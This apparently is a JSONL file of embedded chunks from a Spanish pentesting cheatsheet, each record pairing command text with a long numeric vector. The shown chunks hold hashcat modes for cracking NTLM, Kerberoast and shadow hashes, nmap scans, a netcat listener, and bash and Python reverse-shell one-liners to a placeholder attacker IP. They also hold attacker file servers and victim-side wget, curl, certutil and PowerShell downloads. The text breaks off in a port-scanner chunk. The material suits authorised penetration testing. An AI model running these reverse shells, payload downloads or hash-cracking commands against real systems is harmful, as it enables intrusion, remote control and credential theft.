0.03977, -0.14606, -0.03445, -0.0689, 0.06986, -0.02189, -0.1323, 0.0294, -0.00307, 0.09888, -0.04906, -0.02231, 0.03219, -0.012, 0.0461, 0.07014, -0.01882, -0.0114, 0.0325, 0.03032, -0.06527, 0.02731, 0.02107, 0.00563, -0.07939, 0.05294, 0.05081, -0.08382, 0.02498, -0.04457, -0.03086, 0.03361, 0.07305, 0.05841, -0.05103, 0.04632, 0.0938, 0.07797, -0.05838, 0.04355, 0.01777, -0.01041, 0.02151, -0.09078, 0.0384, 0.02218, 0.01808, -0.02408, -0.03385, 0.02244, 0.05863, -0.01972, 0.06666, 0.14424, -0.01444, 0.0063, 8e-05, -0.03896, -0.07258, 0.00315, 0.02539, -0.0471, -0.02051, 0.02151, -0.1027, -0.01724, 0.09358, 0.01249, -0.00912, -0.02055, -0.01777, -0.03139, -0.02152, 0.05808, 0.0593, -0.05817, -0.03272, 0.0433, 0.05916, 0.01447, 0.03683, 0.00984, -0.02252, -0.01662, 0.04478, -0.03013, 0.00444, 0.03985, 0.00104, 0.03277, 0.00232, -0.03348, -0.00097, 0.05388, -0.02069, 0.03345, -0.05047, 0.04616, -0.0167, -0.00553, -0.0141, -0.04964, 0.00809, -0.01702, 0.00655, -0.00878, 0.03818, -0.03578, 0.05061, 0.05628, 0.02331, -0.00532, -0.04497, -0.01932, -0.03626, -0.00253, -0.04294, -0.00032, -0.03518, 0.00677, 0.03381, -0.03309, -0.00105, 0.02528, -0.06899, 0.05167, -0.00639, -0.01108, -0.02065, 0.01028, -0.01135, -0.01975, -0.044, -0.02798, 0.05194, -0.04663, 0.00183, 0.00189, 0.03295, 0.04077, -0.00335, -0.0021, -0.02978, -0.01362, -0.0108, -0.0027, -0.02154, 0.02865, -0.03013, 0.00639, -0.05431, 0.01748, -0.01189, -0.00052, 0.03765, -0.02345, -0.00388, -0.01498, -0.02334, -0.04973, 0.07929, 0.06041, 0.00808, -0.0427, 0.03121, -0.01741, -0.00708, -0.00162, 0.00711, -0.00928, 0.01863, -0.01113, -0.00187, -0.00833, -0.00434, 0.00041, 0.03441, -0.01329, -0.04395, -0.05006, 0.02055, 0.0219, -0.00638, -0.00364, 0.00817, -0.00882, 0.00031, 0.00131, 0.00421, -0.03767, 0.00781, -0.01863, 0.03622, -0.05942, -0.01307, -0.00498, 0.00411, -0.05543, 0.00868]} +{"tipo": "metodologia", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "tema": "cheatsheets", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "texto": "# Hashcat (modo -m)\nhashcat -m 1000 hashes.txt WL # NTLM\nhashcat -m 0 hashes.txt WL # MD5\nhashcat -m 100 hashes.txt WL # SHA1\nhashcat -m 1800 hashes.txt WL # sha512crypt (/etc/shadow $6$)\nhashcat -m 13100 hashes.txt WL # Kerberoast (TGS)\nhashcat -m 18200 hashes.txt WL # AS-REP\nhashcat -m 5600 hashes.txt WL # NetNTLMv2 (Responder)\nhashcat -m 22000 hash.hc22000 WL # WPA/WPA2\n```", "v": [0.0268, -0.22772, 0.02263, -0.00846, -0.00495, -0.10276, -0.17952, 0.06246, 0.10155, 0.24529, -0.06553, 0.00288, 0.05834, 0.05852, 0.07318, 0.11713, -0.04385, -0.09146, -0.07323, -0.01596, 0.02382, 0.03647, -0.19108, -0.03479, 0.00627, -0.02451, -0.06996, 0.12207, -0.27314, 0.03445, 0.00861, -0.0467, -0.18188, 0.17656, -0.0463, 0.1566, -0.0938, 0.12338, 0.06748, 0.1183, 0.047, 0.13969, -0.0943, 0.09539, 0.06736, -0.15224, -0.03272, -0.0225, 0.02613, -0.11999, 0.02928, -0.01447, -0.16551, 0.01763, -0.01051, -0.04479, 0.13058, 0.03455, -0.16435, -0.04659, 0.00867, 0.02309, -0.00974, -0.12162, -0.02606, -0.032, 0.03009, -0.01316, -0.04917, 0.07452, -0.07432, 0.12797, 0.04789, -0.05618, 0.05163, 0.0669, -0.04514, -0.04672, 0.05686, 0.10057, -0.04454, -0.08137, 0.07456, -0.0176, -0.0877, 0.02238, -0.03271, -0.07514, 0.08495, 0.03602, 0.02007, 0.03812, -0.04853, 0.06455, 0.03416, -0.06158, 0.02315, -0.04076, -0.01757, 0.0037, -0.0861, 0.04372, -0.04061, 0.0149, 0.00521, -0.03199, 0.03255, 0.04341, 0.02164, 0.00665, 0.11216, -0.04992, -0.02471, 0.03069, -0.03259, -0.08396, -0.00323, 0.06608, -0.02064, -0.02534, -0.0594, -0.00856, 0.02312, 0.11918, 0.02872, -0.05821, -0.058, 0.003, -0.01366, -0.03741, 0.04711, 0.02325, -0.07399, -0.01041, 0.00655, 0.07511, 0.02361, 0.07152, -0.00746, 0.02714, 0.08127, 0.01813, -0.07584, 0.02702, 0.06309, 0.03747, 0.0012, -0.0303, -0.0459, 0.00149, 0.0681, 0.0136, 0.04398, -0.00971, -0.01877, -0.00299, -0.02119, -0.0059, -0.05472, -0.00525, 0.0058, -0.03446, 0.03857, 0.00803, -0.03733, 0.03305, 0.04586, -0.01136, 0.02786, -0.04126, -0.02998, -0.01691, 0.01112, -0.03422, 0.02405, -0.05566, 0.03243, 0.01118, -0.04884, -0.02236, -0.00822, -0.04019, 0.07391, -0.00657, 0.02319, -0.0165, 0.01353, 0.02204, 0.01638, -0.01363, -0.03493, 0.05092, -0.03087, 0.00581, 0.02332, 0.01552, 0.03638, -0.00022, -0.0155, -0.01684, -0.00135, 0.00463, 0.00994, -0.02015, 0.01087, -0.02243, -0.00107, -0.03301, -0.01292, -0.03209, -0.03275, 0.04999, 0.02184, 0.0434, -0.06085, 0.01004, -0.00236, 0.02974, 0.02658, 0.05702, -0.06528, 0.03069, 0.02564, -0.01654, 0.00761, 0.002, -0.00394, 0.0457, 0.00478, 0.03494, 0.01615, 0.01479, -0.00869, -0.00942, 0.03357, -0.00464, -0.07058, 0.0149, -0.02785, -0.02251, -0.02261, 0.00746, -0.03323, -0.05291, 0.05096, -0.02533, -0.05404, 0.05215, -0.01601, 0.00452, -0.03954, -0.01513, 0.00454, -0.03049, -0.03731, -0.02674]} +{"tipo": "metodologia", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "tema": "cheatsheets", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "texto": "## Recon de red (nmap, comun)\n\n```bash\nnmap -sn 10.0.0.0/24 # hosts vivos\nnmap -p- --min-rate 5000 IP # todos los puertos, rapido\nnmap -sV -sC -p 22,80,443 IP # version + scripts\nnmap -sU --top-ports 20 IP # UDP\nnmap --script vuln IP\n```", "v": [0.16522, -0.19039, -0.04905, -0.10388, 0.04876, -0.14407, -0.02225, -0.10653, -0.12307, 0.08364, 0.15278, -0.12095, 0.09534, -0.08164, -0.2144, 0.04993, -0.13842, 0.00033, 0.09468, 0.05337, -0.0347, 0.13161, -0.10126, 0.02456, 0.03725, 0.18796, -0.10196, 0.11997, -0.06061, -0.11196, -0.02913, -0.09115, -0.1005, -0.08567, -0.09288, -0.06303, 0.05354, 0.04569, 0.01215, 0.15327, -0.04303, 0.09477, -0.04649, -0.03402, 0.10158, -0.03424, 0.01966, -0.03685, 0.00165, -0.08676, -0.12397, -0.02641, -0.07667, -0.02098, -0.15627, 0.07805, 0.02671, -0.00252, -0.05832, 0.06663, -0.00938, 0.10739, -0.09723, -0.17285, 0.0505, -0.03286, -0.0645, -0.12754, -0.07902, -0.04753, -0.05329, 0.00177, -0.01143, 0.03413, 0.08874, -0.00932, -0.00811, -0.11566, 0.05103, 0.05479, -0.01085, -0.02971, -0.14834, -0.06162, -0.06724, -0.08229, 0.02192, -0.06632, 0.00132, -0.07268, 0.05468, 0.00841, 0.01556, 0.0723, 0.03773, -0.10474, -0.00612, 0.05309, 0.00415, 0.02991, -0.02333, 0.1031, -0.13007, 0.03392, 0.09426, 0.08013, 0.06955, 0.05151, 0.08148, 0.06786, 0.11592, 0.05969, -0.03718, -0.07842, 0.04605, 0.00019, -0.0425, 0.00684, 0.017, -0.06539, -0.02667, -0.04643, 0.05851, 0.04418, 0.00282, 0.01129, 0.00371, 0.01466, 0.07095, 0.01841, -0.01579, -0.01001, -0.02387, -0.00426, 0.03569, 0.05718, 0.0326, -0.00586, -0.05236, 0.07588, 0.00166, 0.02533, -0.05582, 0.02701, 0.08415, -0.01329, -0.00035, -0.08199, -0.01393, 0.05606, 0.08939, 0.03578, -0.04537, -0.00786, -0.01941, 0.00589, -0.0115, -0.0481, -0.04098, 0.02685, 0.03364, 0.02878, 0.06755, 0.01715, 0.00861, 0.05513, -0.02453, 0.00589, 0.0614, -0.06292, -0.01467, 0.00485, -0.05962, -0.0363, 0.01533, -0.03804, 0.01832, 0.01063, -0.03347, -0.03347, 0.01504, -0.03532, -0.0247, 0.00202, -0.00046, -0.0297, 0.02145, 0.0018, -0.00291, -0.00816, 0.05081, 0.02946, -0.02743, 0.04396, 0.03642, 0.00778, -0.00916, -0.08327, -0.00988, 0.00135, -0.03442, 0.03293, 0.01129, -0.03404, -0.00756, -0.00929, -0.04663, 0.05006, -0.01098, 0.01881, 0.00726, -0.00704, 0.03422, -0.0225, -0.05457, -0.02145, -0.00997, 0.02072, 0.05515, -0.05357, 0.03049, 0.05603, -0.03014, 0.01896, 0.00028, -0.03577, 0.00642, 0.01304, 0.05858, -0.03236, -0.05287, 0.02136, -0.05867, -0.08319, 0.04093, 0.01607, -0.01898, 0.00996, -0.02163, -0.03045, -0.00644, -0.00727, -0.02285, -0.04968, -0.00439, -0.03347, -0.03236, 0.03132, 0.01576, -0.0056, -0.02551, -0.05756, -0.02572, -0.04785, -0.00428, 0.0404]} +{"tipo": "metodologia", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "tema": "cheatsheets", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "texto": "# Escucha\nnc -lvnp 4444\nrlwrap nc -lvnp 4444 # con historial", "v": [0.09723, -0.20407, 0.07344, -0.08408, 0.0523, -0.16162, -0.04785, -0.00207, 0.04792, 0.10529, 0.02562, -0.16785, 0.03765, -0.09839, -0.13123, 0.04538, -0.24218, -0.03597, -0.00523, 0.09797, -0.19862, 0.05721, -0.14387, 0.02797, -0.0117, 0.08144, -0.04711, 0.00598, -0.00157, 0.04837, 0.02308, -0.00444, -0.09282, 0.08787, 0.07459, 0.14698, 0.10448, -0.04492, -0.10771, 0.15929, 0.03664, 0.15973, -0.0987, 0.05821, 0.18493, -0.09839, -0.05754, -0.0898, 0.05051, -0.12424, 0.04745, 0.04372, -0.16264, -0.06126, -0.07668, 0.08371, -0.02737, 0.09011, 0.04624, 0.02842, -0.1113, -0.04798, -0.05588, -0.0445, -0.00391, -0.06935, 0.09858, -0.13163, -0.09822, -0.025, -0.04504, 0.026, -0.01558, -0.07957, 0.05612, -0.02082, 0.12721, -0.08648, -0.01878, 0.07855, -0.04015, 0.06303, 0.06099, -0.07014, -0.01579, 0.04701, 0.00301, 0.007, 0.03054, -0.0355, 0.05679, -0.00102, 0.00928, 0.05045, 0.04553, -0.01809, 0.02874, -0.06425, 0.07073, 0.01308, 0.08534, 0.07629, 0.03839, -0.05474, -0.0161, -0.05863, 0.04265, -0.03949, 0.02857, 0.13887, 0.00975, 0.03767, -0.04697, 0.04339, 0.06469, -0.03054, -0.04327, 0.09312, 0.04413, -0.05991, 0.01847, 0.0092, 0.03849, 0.02953, -0.00856, 0.12032, 0.00317, 0.01007, -0.08287, 0.01385, 0.06566, 0.06427, 0.0393, -0.01308, -0.0398, -0.01956, 0.01287, -0.04304, 0.0166, -0.00706, -0.01426, -0.03154, -0.04963, -0.03271, 0.05003, -0.06134, 0.01101, -0.05, 0.01486, 0.06302, 0.09001, 0.03224, 0.02437, 0.03023, -0.00184, 0.04122, 0.03901, -0.00879, -0.07723, 0.00311, 0.04507, 0.0447, 0.03748, 0.06133, 0.0074, 0.00894, 0.01674, -0.05205, -0.00086, -0.0041, 0.05827, -0.00903, 0.05206, -0.08388, -0.05643, -0.04831, -0.00734, 0.03499, -0.03282, 0.0315, -0.02078, -0.02169, 0.0337, -0.07111, -0.03019, -0.01708, 0.02836, 0.00552, -0.00808, 0.04048, 0.02453, -0.01651, -0.02344, 0.01812, -0.04957, 0.04424, -0.00389, -0.03912, -0.03021, 0.01976, -0.05339, 0.02473, 0.07234, -0.02407, -0.08295, -0.05907, 0.02167, 0.006, -0.02716, -0.02421, 0.01724, 0.00101, 0.0104, -7e-05, -0.06347, -0.03724, -0.02332, 0.01849, -0.02403, -0.03067, 0.00613, -0.00016, 0.02447, -0.01049, 0.02507, 0.0424, 0.02262, -0.00704, -0.01404, -0.09619, 0.00155, -0.02978, 0.03313, -0.02118, 0.0203, -0.06585, -0.04172, -0.04245, 0.02767, -0.04235, 0.08695, -0.00136, -0.05189, 0.01176, 0.01007, 0.01731, -0.02064, 0.02236, -0.00497, 0.04533, 0.03116, -0.03474, 0.02648, 0.0285, -0.04831, 0.02156]} +{"tipo": "metodologia", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "tema": "cheatsheets", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "texto": "# Disparo (Linux)\nbash -i >& /dev/tcp/TU_IP/4444 0>&1\nsh -i >& /dev/tcp/TU_IP/4444 0>&1\npython3 -c 'import socket,os,pty;s=socket.socket();s.connect((\"TU_IP\",4444));[os.dup2(s.fileno(),f) for f in(0,1,2)];pty.spawn(\"/bin/bash\")'", "v": [0.14205, -0.20858, -0.17075, -0.04, 0.12576, -0.20421, 0.00594, -0.04402, 0.02562, 0.17508, -0.0384, 0.00989, -0.02854, -0.10122, -0.12848, -0.07723, -0.11088, -0.15464, 0.08776, -0.10885, 0.00068, 0.17463, -0.16285, -0.05046, 0.03382, 0.17434, -0.05818, 0.0235, -0.13409, -0.04468, 0.02167, -0.09988, -0.02598, 0.0187, -0.11927, -0.0771, 0.03377, 0.08399, 0.00765, 0.21295, -0.03827, 0.01, -0.09467, 0.07376, 0.02786, -0.08864, 0.08543, -0.03926, 0.05342, -0.0498, -0.05979, -0.06429, -0.01403, -0.04702, -0.09102, 0.03068, 0.11442, -0.0278, 0.02588, -0.01944, -0.10083, 0.05201, -0.09974, -0.12217, 0.098, -0.03827, -0.05125, -0.04459, -0.1079, -0.01153, -0.02057, 0.09199, -0.0686, -0.01073, 0.10327, -0.00423, -0.01463, -0.1268, 0.05318, 0.03559, -0.04434, -0.01312, -0.00126, -0.04765, -0.06192, -0.07609, 0.03093, 0.02016, -0.04749, 0.01839, 0.04128, 0.11857, -0.01945, 0.03094, 0.03501, -0.04178, 0.03972, 0.00861, -0.01805, -0.00943, -0.00299, 0.0926, -0.10567, 0.10407, 0.06543, 0.01085, 0.07608, 0.00353, 0.0494, 0.02603, 0.03833, 0.02834, 0.05726, -0.07808, -0.0001, -0.06231, -0.09081, 0.04608, 0.06289, 0.01638, -0.04962, -0.03539, 0.00366, 0.01243, -0.04312, 0.02733, -0.01901, 0.08366, -0.01602, -0.04952, 0.05563, -0.02576, 0.03446, -0.00931, -0.01155, 0.1291, 0.01637, -0.03507, 0.0313, -0.00224, 0.02938, -0.00054, -0.02208, -0.00054, 0.13702, 0.0065, 0.00302, -0.09163, -0.04419, 0.01489, 0.07957, 0.03982, -0.00987, 0.033, -0.05361, 0.00734, 0.014, -0.06572, -0.00264, 0.00938, 0.05063, 0.03631, 0.04478, 0.01675, -0.01549, 0.04281, -0.02905, -0.02783, 0.0228, -0.01461, -0.00576, 0.01322, -0.04658, -0.04869, -0.04478, -0.13532, 0.05996, -0.01756, -0.04295, -0.02144, 0.01085, -0.06767, 0.00926, 0.01156, 0.01983, 0.03862, 0.017, 0.00148, 0.02768, 0.01673, 0.08963, 0.03543, -0.04828, 0.02622, -0.01002, -0.00526, 0.00714, -0.04558, -0.02026, 0.00749, -0.06718, 0.04764, 0.00587, -0.02977, 0.00165, -0.04567, -0.03043, -0.00874, -0.00329, 0.01788, 0.01477, -0.01917, 0.0351, -0.00516, -0.08547, -0.0098, 0.00518, 0.06054, 0.06283, 0.01395, -0.0055, 0.01107, 0.01016, 0.02728, 0.01927, 0.00443, 0.04545, -0.02611, 0.02169, -0.01265, 0.01788, 0.06979, -0.00227, -0.07654, -0.01389, -0.03478, -0.05747, -0.01722, -0.01698, -0.06107, 0.01236, 0.02473, -0.031, -0.06068, -0.0182, -0.03928, -0.05037, 0.04964, -0.01081, -0.00274, -0.04224, -0.02544, 0.02449, -0.06304, -0.02721, -0.00082]} +{"tipo": "metodologia", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "tema": "cheatsheets", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "texto": "# Estabilizar la TTY tras coger la shell\npython3 -c 'import pty;pty.spawn(\"/bin/bash\")'", "v": [0.12813, -0.19266, -0.16454, -0.03051, 0.16436, -0.15058, 0.07134, -0.08095, 0.03892, 0.10491, -0.10072, 0.20946, 0.04975, 0.07019, -0.0745, -0.02729, -0.13812, -0.0571, 0.04274, 0.03479, -0.039, 0.04134, -0.04424, -0.04835, 0.11727, 0.14395, -0.07347, -0.02482, -0.23031, 0.10345, 0.0428, -0.00675, 0.03326, -0.05873, -0.04155, -0.0252, 0.03233, 0.04872, -0.01439, 0.21143, -0.13256, -0.17186, 0.0327, 0.10532, 0.03927, -0.06201, 0.00789, 0.03611, 0.05535, 0.012, -0.06969, -0.04092, -0.06299, -0.00929, 0.0296, -0.0082, 0.08312, -0.03786, 0.07474, 0.04232, -0.12387, -0.02314, -0.05218, 0.00403, -0.03643, 0.03734, -0.05153, -0.08055, -0.14625, 0.05945, -0.04998, 0.03089, -0.04931, -0.10215, 0.0975, -0.00896, -0.11268, -0.04997, 0.01832, 0.09375, -0.06712, -0.148, 0.03392, -0.00985, 0.01053, -0.09111, -0.01323, 0.02997, 0.02016, 0.04771, 0.06905, -0.00823, -0.01975, 0.01299, -0.04914, -0.0162, -0.04196, -0.06531, 0.01994, 0.01922, -0.07254, -0.0006, -0.00621, 0.10796, -0.05034, 0.04403, 0.01741, 0.03185, 0.01336, 0.00513, 0.09503, -0.00305, -0.0053, -0.10313, -0.01562, -0.03478, -0.12884, 0.0164, 0.04506, -0.00825, -0.01037, -0.03235, 0.0082, 0.07924, -0.09164, -0.01175, -0.00511, 0.07419, -0.06659, -0.07052, 0.01113, 0.0331, 0.03823, -0.01305, 0.00657, 0.07909, 0.00476, -0.02846, -0.00084, -0.01473, -0.0555, 0.09245, 0.02996, 0.02967, 0.09514, 0.09305, 0.01328, -0.05677, -0.06328, 0.05853, 0.12211, 0.03072, 0.05796, 0.014, -0.061, 0.01108, 0.00099, -0.00784, 0.03199, -0.00453, 0.0933, 0.01728, -0.04189, -0.05203, -0.02057, -0.00263, -0.03071, -0.10765, -0.02339, -0.02939, 0.0069, 0.01997, -0.05046, -0.00253, 0.03513, -0.09308, 0.03389, -0.02049, -0.01448, -0.02673, 0.02315, -0.02285, -0.03644, -0.01808, 0.03157, -0.02356, 0.01345, 0.06966, 0.01776, 0.01072, 0.06755, 0.0601, -0.05306, -0.04249, 0.01627, -0.06364, 0.01366, -0.04466, 0.0448, -0.04135, 0.0103, 0.08309, 0.03042, -0.06905, 0.05045, -0.00891, -0.04995, 0.0309, 0.02664, -0.01244, -0.00449, -0.01183, 0.07899, 0.05086, 0.00306, -0.04692, -0.02473, -0.01038, -0.00212, 0.03238, -0.03755, 0.0638, 0.07319, -0.01372, -0.04722, 0.00762, 0.04949, -0.02687, 0.05047, 0.02727, -0.02644, 0.00906, -0.00322, -0.03947, -0.02838, 0.01831, -0.01513, -0.02924, -0.03887, -0.03837, 0.02593, 0.02026, -0.01746, -0.03925, -0.01364, -0.0096, 0.0178, 0.03397, 0.03435, -0.02478, -0.05242, 0.04451, 0.00116, -0.07966, -0.01656, -0.03955]} +{"tipo": "metodologia", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "tema": "cheatsheets", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "texto": "# Servir desde el atacante\npython3 -m http.server 80\nimpacket-smbserver share $(pwd) -smb2support # SMB", "v": [0.15587, -0.2567, -0.06889, -0.15847, -0.18291, -0.15474, -0.14241, -0.2501, -0.0694, 0.12013, -0.07988, 0.10584, 0.20028, -0.19731, -0.14108, 0.07244, -0.09684, -0.06024, 0.09947, 0.12512, 0.1973, 0.1034, -0.00576, -0.07096, 0.04122, 0.12973, -0.00922, 0.10502, -0.02576, 0.01613, 0.03049, -0.06843, 0.04006, 0.0294, 0.0426, -0.11489, 0.02179, 0.03542, 0.05984, 0.13742, -0.04183, -0.14405, 0.02027, -0.0834, 0.02387, -0.01024, 0.06178, -0.00654, 0.00245, -0.04459, -0.06968, 0.02128, -0.099, -0.01982, -0.08546, 0.0341, 0.11215, -0.08631, -0.00859, 0.05922, -0.06155, 0.03839, 0.01298, -0.06344, 0.10203, -0.05566, -0.04225, 0.03975, -0.10268, 0.04826, -0.10826, 0.02772, 0.11577, -0.02867, 0.01573, 0.03936, 0.01726, 0.03382, 0.06378, 0.05541, 0.04154, -0.03398, -0.05634, 0.01172, -0.02447, -0.11538, 0.05121, 0.00101, 0.04353, -0.02007, 0.03976, 0.0451, -0.05609, 0.04273, -0.11429, -0.03755, -0.01416, -0.01371, 0.098, -0.03949, -0.01629, 0.03325, -0.02457, 0.00719, -0.00354, -0.03861, 0.01042, 0.01485, -0.07358, -0.0128, 0.08264, -0.04098, -0.01904, 0.05138, -0.04485, -0.10139, -0.01935, 0.00142, 0.03222, 0.00556, 0.00265, 0.0088, 0.0045, 0.04232, -0.08882, -0.01998, 0.06477, 0.04552, -0.05303, -0.02815, -0.03914, -0.01336, 0.08909, -0.02357, -0.03717, 0.01866, 0.00491, 0.00334, -0.05074, 0.07661, -0.06409, 0.05891, -0.0032, 0.04845, 0.01829, 0.03054, 0.07395, -0.03063, -0.04552, -0.00882, 0.09034, 0.03391, -0.02704, -0.01021, 0.0231, 0.00647, -0.0282, 0.01043, -0.09341, 0.01799, 0.00088, 0.01907, -0.02759, 0.00634, 0.01043, -0.0094, 0.01791, -0.05368, 0.08607, -0.0658, -0.02416, -0.02048, 0.00968, -0.06802, 0.04655, -0.09706, 0.03706, -0.00219, -0.01306, -0.01552, -0.01121, -0.02051, -0.0363, 0.01, 0.0266, -0.0455, 0.02767, 0.04048, 0.0067, -0.03181, -0.0061, 0.0101, -0.00547, -0.00523, 0.03459, -0.00271, -0.01172, -0.01422, 0.0146, -0.00924, -0.02415, 0.02057, -0.05792, -0.01533, -0.03392, -0.01004, -0.02834, -0.00571, -0.02006, -0.05222, 0.02405, -0.02751, 0.02284, -0.02205, 0.00605, -0.0301, -0.01716, 0.04936, 0.04103, -0.04082, -0.02594, 0.01907, -0.00134, -0.01165, 0.02442, -0.04331, -0.00716, -0.05944, 0.01797, -0.02186, -0.02032, -0.01353, 0.02407, -0.0007, 0.00877, -0.02426, -0.00704, 0.01323, -0.0061, 0.00104, -0.01943, -0.03051, 0.00513, -0.01437, 0.00048, 0.02526, -0.02663, -0.0403, -0.04553, 0.02284, 0.03497, -0.07451, -0.02746, -0.01108, -0.04799, 0.00921]} +{"tipo": "metodologia", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "tema": "cheatsheets", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "texto": "# Recibir en la victima\nwget http://TU_IP/file -O /tmp/file\ncurl http://TU_IP/file -o /tmp/file\ncertutil -urlcache -f http://TU_IP/file file.exe # Windows\npowershell iwr http://TU_IP/file -OutFile file # Windows\n```", "v": [-0.06577, -0.14375, -0.13103, -0.06002, 0.13392, -0.19272, -0.03487, -0.02276, 0.04891, 0.03914, 0.04178, -0.06516, 0.05534, -0.02561, -0.10583, -0.03256, -0.00136, -0.09645, 0.18615, -0.17972, 0.02202, 0.13607, -0.14995, 0.02635, -0.03945, 0.12891, -0.14673, 0.03697, -0.0608, -0.21851, 0.06406, -0.10795, -0.01158, -0.06976, -0.08005, 0.0026, 0.00964, 0.02715, -0.02565, 0.15883, 0.02701, 0.0966, -0.14979, 0.17308, 0.0333, -0.06339, 0.05906, -0.02337, 0.13645, -0.05449, 0.02206, -0.10516, -0.01181, -0.05146, -0.01903, -0.01455, 0.0741, -0.12705, -0.01594, 0.01136, -0.0725, 0.17852, -0.09311, -0.03635, 0.04731, -0.0187, 0.03333, 0.00755, -0.09116, 0.01331, -0.01111, 0.03071, 0.0363, -0.01575, -0.00059, -0.0714, -0.0534, -0.09158, 0.09246, 0.01062, -0.01302, 0.08221, -0.02002, -0.04455, -0.07715, -0.10678, 0.02931, -0.10549, 0.03023, -0.09035, 0.06171, 0.01007, -0.04617, 0.0979, 0.08978, -0.08349, 0.05671, 0.0171, 0.02284, 0.00318, -0.04595, -0.00233, -0.07209, 0.0365, 0.08284, 0.0083, -0.00186, 0.03194, -0.0407, 0.02637, 0.00572, 0.09201, 0.07325, 0.02903, -0.02082, -0.0818, -0.03068, -0.02969, 0.00666, 0.01755, -0.02255, -0.05073, -0.0512, 0.02226, -0.0808, -0.05414, -0.00644, 0.11526, -0.09634, -0.0094, 0.06707, -0.01743, -0.02827, -0.02255, 0.02118, 0.01485, 0.02201, 0.03093, -0.00619, 0.02399, 0.09608, -0.0129, 0.00079, 0.08647, 0.06249, -0.03979, -0.01228, -0.01206, 0.0022, -0.04953, 0.08529, 0.01894, -0.00928, -0.04939, -0.05026, 0.02798, 0.01077, -0.00514, 0.03483, -0.05235, -0.021, 0.07338, 0.01018, 0.00154, 0.04105, 0.01834, -0.04408, 0.08373, 0.0792, -0.03377, 0.00768, 0.01224, -0.01749, -0.04616, -0.01895, -0.12424, 0.103, -0.06665, -0.00906, -0.02893, -0.01607, -0.04575, 0.0512, 0.03667, 0.00818, 0.00365, 0.04897, -0.00974, -0.07616, 0.01391, 0.0381, 0.01507, -0.01294, -0.0124, 0.03726, -0.04084, -0.05862, -0.03498, 0.04003, 0.0139, -0.09413, -0.05685, -0.02031, -0.03845, 0.06456, -0.01106, -0.03694, 0.01392, -0.01515, -0.01193, 0.02394, 0.03934, 0.02367, -0.03043, -0.04889, -0.04019, 0.00428, 0.08982, 0.04103, -0.03864, -0.02379, 0.02354, 0.05175, -0.00186, 0.00296, -0.03203, 0.00662, -0.00497, -0.02134, -0.02151, -0.01751, 0.10061, -0.02315, -0.04187, 0.02835, -0.02919, -0.04653, -0.00542, -0.01261, -0.02991, -0.02936, 0.04917, -0.02004, -0.04467, -0.04987, -0.01259, -0.06255, 0.00448, 0.08002, -0.03604, -0.04609, -0.05988, -0.00523, -0.00923, -0.02802, 0.0101]} +{"tipo": "metodologia", "herramienta": "Port scanner PowerShell", "perfil": "PENTESTERS", "tema": "cheatsheets", "fichero": "conocimiento/06 - Cheatsheets/Port scanner PowerShell.md", "texto": "# Port scanner en PowerShell\n\n> Escanear puertos **desde la víctima Windows sin nmap** (útil tras un foothold para mirar la red interna, antes de montar Pivoting ligolo-ng). Usa Operadores PowerShell.", "v": [-0.04329, -0.25715, -0.15707, -0.16979, -0.15342, -0.06383, -0.03974, -0.18276, -0.07642, -0.06622, -0.03727, 0.01995, 0.12885, -0.06271, -0.06799, -0.04206, -0.03986, -0.01127, 0.05622, -0.01325, -0.16943, 0.12351, -0.09583, -0.10849, 0.06528, 0.20766, -0.04398, 0.0538, -0.13914, -0.00766, -0.07671, 0.03683, 0.04889, -0.03491, -0.01283, -0.04993, -0.01575, -0.01098, 0.2461, 0.19046, -0.04901, 0.15859, -0.01978, 0.00851, 0.15781, -0.05907, 0.04187, -0.04077, 0.05853, 0.07625, -0.02134, 0.01347, -0.14125, -0.05522, -0.01757, -0.09727, 0.05568, 0.04491, 0.00301, -0.09846, 0.03756, 0.08229, -0.07542, -0.00082, -0.04461, -0.01202, -0.00028, 0.00807, -0.07063, 0.02165, -0.11676, 0.00705, 0.01608, 0.06852, 0.02028, -0.0645, 0.05767, -0.02968, 0.08834, 0.02663, -0.02606, 0.02816, -0.1524, -0.07142, -0.01715, -0.07762, -0.02477, -0.04733, -0.01892, -0.0596, 0.13525, -0.05034, -0.02306, 0.09236, 0.03846, -0.06535, -0.01941, 0.01478, 0.01265, -0.01813, 0.03806, -0.07695, -0.08151, 0.04355, 0.07684, -0.01002, -0.03935, -0.01131, 0.01766, -0.00951, 0.0653, 0.05856, -0.04738, -0.03524, -0.07534, -0.02752, -0.04248, -0.12331, -0.07672, 0.03083, 0.02996, -0.01404, 0.04034, 0.0015, 0.01408, -0.0581, 0.06529, 0.05345, 0.04864, 0.02025, 0.04524, -0.00334, -0.04256, -0.0303, -0.08831, 0.00719, 0.01184, -0.08429, 0.01652, -0.02717, -0.01307, 0.03911, -0.06395, 0.00265, -0.01469, 0.00871, 0.00542, 0.0273, -0.02451, 0.01464, 0.09449, 0.07821, -0.02245, -0.00339, -0.02837, 0.0039, 0.07236, 0.00116, -0.0644, 0.03839, -0.01642, -0.01927, 0.0246, -0.01661, 0.01543, -0.05528, -0.06672, -0.04783, 0.03841, -0.06983, -0.01046, 0.07492, -0.06497, 0.01766, 0.01611, -0.04036, 0.05108, -0.04179, -0.0866, -0.01317, -0.03625, 0.06237, 0.00168, -0.01316, -0.05351, -0.00677, -0.03627, -0.05502, -0.03197, 0.01361, -0.00495, -0.00437, 0.04981, -0.01994, 0.04223, 0.00868, -0.01373, -0.02011, 0.00223, -0.05171, -0.05466, 0.00738, -0.02854, -0.00116, 0.09676, 0.01383, -0.0582, 0.00384, -0.02044, 0.00761, 0.05006, 0.01086, 0.04704, -0.02007, -0.01845, -0.04494, -0.00376, -0.01847, -0.01451, 0.03739, -0.0732, 0.02181, -0.00101, 0.03578, 0.0088, -0.03332, -0.02514, 0.00938, -0.01117, 0.03152, 0.0434, 